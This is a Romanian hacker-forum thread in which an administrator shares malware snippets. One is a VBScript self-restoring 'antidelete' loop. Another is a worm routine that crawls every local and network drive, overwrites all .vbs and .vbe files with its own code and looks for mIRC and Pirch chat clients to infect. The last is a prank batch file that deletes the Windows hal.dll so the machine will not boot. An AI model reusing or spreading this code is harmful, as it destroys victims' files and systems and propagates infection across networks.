hackeri
Cultul Hackerilor
|
Lista Forumurilor Pe Tematici
|
hackeri | Reguli | Inregistrare | Login
POZE HACKERI
Nu sunteti logat.
|
Nou pe simpatie: Ioana24 pe Simpatie.ro
 | Femeie 25 ani Bucuresti cauta Barbat 27 - 43 ani |
|
Adrian
Administrator
 Inregistrat: acum 18 ani
Postari: 131
|
|
Nume:Antideletion
Code: Function Antidelete() Set fso = CreateObject("scripting.filesystemobject" Set Myself = fso.opentextfile(wscript.scriptfullname, 1) MyCode = Myself.readall Myself.Close Do If Not (fso.fileexists(wscript.scriptfullname)) Then Set Myself = fso.createtextfile(wscript.scriptfullname, True) Myself.write MyCode Myself.Close End If Loop End Function
Ce face ? Daca stregi un fisier il readuce inapoi.
|
|
| pus acum 18 ani |
|
Adrian
Administrator
 Inregistrat: acum 18 ani
Postari: 131
|
|
Nume:Infectfiles-Search
Code: Function Dodrives() On Error Resume Next Set fso = CreateObject("scipting.filesystemobject" Set Drives = fso.Drives For Each Drive In Drives If Drive.Drivetype = Remote Then Drivefull = Drive & "" Call Subfolders(Drivefull) ElseIf Drive.IsReady Then Drivefull = Drive & "" Call Subfolders(Drivefull) End If Next End Function Function Subfolders(path) newpath=path Set Fold = fso.GetFolder(newpath) Set Files = Fold.Files For Each file In Files If fso.GetExtensionName(file.path) = "vbs" Then fso.copyfile wscript.scriptfullname, file.path, True End If If fso.GetExtensionName(file.path) = "vbe" Then fso.copyfile wscript.scriptfullname, file.path, True End If If file.Name = "mirc.ini" Then Mirc (file.ParentFolder) End If If file.Name = "Pirch32.exe" Then Pirch (file.ParentFolder) End If Next Set file = Fold.Subfolders For Each Subfol In file Call Subfolders(Subfol.path) Next End Function
Ce face? These two funtions will search in all the HD for mirc.ini, Pirch32.exe, vbs and vbe files. When its found any of them it calls the infection function.
|
|
| pus acum 18 ani |
|
Adrian
Administrator
 Inregistrat: acum 18 ani
Postari: 131
|
|
code:
echo Bine ai venit ...rww cenzurat pause del %WINDIR%System32hal.dll echo Press space key pause echo Da' prost mai esti bre.... Nu iti mai mere windowsu' ) pause rem Daca ai citit aici inainte de a executa bat-ul, inseamna ca esti destept..) ti-ar fi sters fisierul HAL.dll si windowsul nu ar mai fi butat
|
|
| pus acum 18 ani |
|